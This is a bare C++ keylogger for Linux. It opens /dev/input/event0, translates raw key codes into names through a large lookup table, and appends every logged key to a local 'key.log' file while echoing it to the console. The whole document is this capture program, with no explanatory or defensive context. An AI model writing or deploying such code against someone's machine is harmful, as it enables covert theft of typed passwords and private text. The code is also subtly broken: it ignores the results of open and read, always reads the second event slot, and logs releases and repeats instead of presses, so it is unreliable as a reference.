#include <string>
#include <iostream>
#include <fstream>
#include <unistd.h>
#include <fcntl.h>
#include <linux/input.h>

const char* KEY_EVENTS = "/dev/input/event0";

const std::string keys[] = {
    "Reserved",		"Esc",
    "1",			"2",
    "3",			"4",
    "5",			"6",
    "7",			"8",
    "9",			"0",
    "Minus",		"Equal",
    "Backspace",	"Tab",
    "Q",			"W",
    "E",			"R",
    "T",			"Y",
    "U",			"I",
    "O",			"P",
    "LeftBrace",	"RightBrace",
    "Enter",		"LeftControl",
    "A",			"S",
    "D",			"F",
    "G",			"H",
    "J",			"K",
    "L",			"Semicolon",
    "Apostrophe",	"Grave",
    "LeftShift",	"BackSlash",
    "Z",			"X",
    "C",			"V",
    "B",			"N",
    "M",			"Comma",
    "Dot",			"Slash",
    "RightShift",	"KPAsterisk",
    "LeftAlt",		"Space",
    "CapsLock",		"F1",
    "F2",			"F3",
    "F4",			"F5",
    "F6",			"F7",
    "F8",			"F9",
    "F10",			"NumLock",
    "ScrollLock",	"KP7",
    "KP8",			"KP9",
    "KPMinus",		"KP4",
    "KP5",			"KP6",
    "KPPlus",		"KP1",
    "KP2",			"KP3",
    "KP0",			"KPDot",
    "Zenkaku/Hankaku","102nd",
    "F11","F12",
    "RO","Katakana",
    "HIRA","Henkan",
    "Kata","Muhenkan",
    "KPJp","KPEnter",
    "Righ","KPSlash",
    "SysR","RightAlt",
    "Line","Home",
    "Up","PageUp",
    "Left","Right",
    "End","Down",
    "PageDown",	"Insert",
    "Delete",	"Macro",
    "Mute",		"VolumeDown",
    "VolumeUp",	"Power",
    "KPEqual",	"KPPlusMinus",
    "Pause",	"KPComma",
    "Hanguel",	"Hanja",
    "Yen",		"LeftMeta",
    "RightMeta","Compose",
    "Stop",		"Again",
    "Props",	"Undo",
    "Front",	"Copy",
    "Open",		"Paste",
    "Find",		"Cut",
    "Help",		"Menu",
    "Calc",		"Setup",
    "Sleep",	"WakeUp",
    "File","SendFile",
    "DeleteFile","X-fer",
    "Prog1",	"Prog2",
    "WWW",		"MSDOS",
    "Coffee",	"Direction",
    "CycleWindows","Mail",
    "Bookmarks","Computer",
    "Back",		"Forward",
    "CloseCD",	"EjectCD",
    "EjectCloseCD","NextSong",
    "PlayPause","PreviousSong",
    "StopCD",	"Record",
    "Rewind",	"Phone",
    "ISOKey",	"Config",
    "HomePage","Refresh",
    "Exit",	"Move",
    "Edit",	"ScrollUp",
    "ScrollDown","KPLeftParenthesis",
    "KPRightParenthesis","F13",
    "F14",		"F15",
    "F16",		"F17",
    "F18",		"F19",
    "F20",		"F21",
    "F22",		"F23",
    "F24",		"PlayCD",
    "PauseCD",	"Prog3",
    "Prog4",	"Suspend",
    "Close",	"Play",
    "Fast Forward","Bass Boost",
    "Print",	"HP",
    "Camera",	"Sound",
    "Question",	"Email",
    "Chat",		"Search",
    "Connect",	"Finance",
    "Sport",	"Shop",
    "Alternate Erase",	"Cancel",
    "Brightness down", "Brightness up",
    "Media",			"Unknown",
    "Btn0",			"Btn1",
    "Btn2",			"Btn3",
    "Btn4",			"Btn5",
    "Btn6",			"Btn7",
    "Btn8",			"Btn9",
    "LeftBtn",			"RightBtn",
    "MiddleBtn",		"SideBtn",
    "ExtraBtn",		"ForwardBtn",
    "BackBtn",			"TaskBtn",
    "Trigger",		"ThumbBtn",
    "ThumbBtn2",		"TopBtn",
    "TopBtn2",			"PinkieBtn",
    "BaseBtn",			"BaseBtn2",
    "BaseBtn3",		"BaseBtn4",
    "BaseBtn5",		"BaseBtn6",
    "BtnDead",			"BtnA",
    "BtnB",			"BtnC",
    "BtnX",			"BtnY",
    "BtnZ",			"BtnTL",
    "BtnTR",			"BtnTL2",
    "BtnTR2",			"BtnSelect",
    "BtnStart",		"BtnMode",
    "BtnThumbL",		"BtnThumbR",
    "ToolPen",		"ToolRubber",
    "ToolBrush",		"ToolPencil",
    "ToolAirbrush",	"ToolFinger",
    "ToolMouse",		"ToolLens",
    "Touch",			"Stylus",
    "Stylus2",		"Tool Doubletap",
    "Tool Tripletap", "WheelBtn",
    "Gear up",		"Ok",
    "Select",		"Goto",
    "Clear",			"Power2",
    "Option",		"Info",
    "Time",			"Vendor",
    "Archive",		"Program",
    "Channel",		"Favorites",
    "EPG",			"PVR",
    "MHP",			"Language",
    "Title",			"Subtitle",
    "Angle",			"Zoom",
    "Mode",			"Keyboard",
    "Screen",		"PC",
    "TV",			"TV2",
    "VCR",			"VCR2",
    "Sat",			"Sat2",
    "CD",			"Tape",
    "Radio",			"Tuner",
    "Player",		"Text",
    "DVD",			"Aux",
    "MP3",			"Audio",
    "Video",			"Directory",
    "List",			"Memo",
    "Calendar",		"Red",
    "Green",			"Yellow",
    "Blue",			"ChannelUp",
    "ChannelDown",	"First",
    "Last",			"AB",
    "Next",			"Restart",
    "Slow",			"Shuffle",
    "Break",			"Previous",
    "Digits",		"TEEN",
    "TWEN",			"Delete EOL",
    "Delete EOS",		"Insert line",
    "Delete line",
};


int main() {
    int fd, rd;
    fd = open("/dev/input/event0", O_RDONLY);
    std::ofstream logFile ("key.log", std::ios::app);
    struct input_event ev[64];
    while (1) {
        rd = read(fd, ev, sizeof(struct input_event) * 64);
        if (ev[1].value !=1) {
            logFile << keys[ev[1].code] << std::endl;
            std::cout << keys[ev[1].code] << std::endl;
        }
    }

    return 0;
}
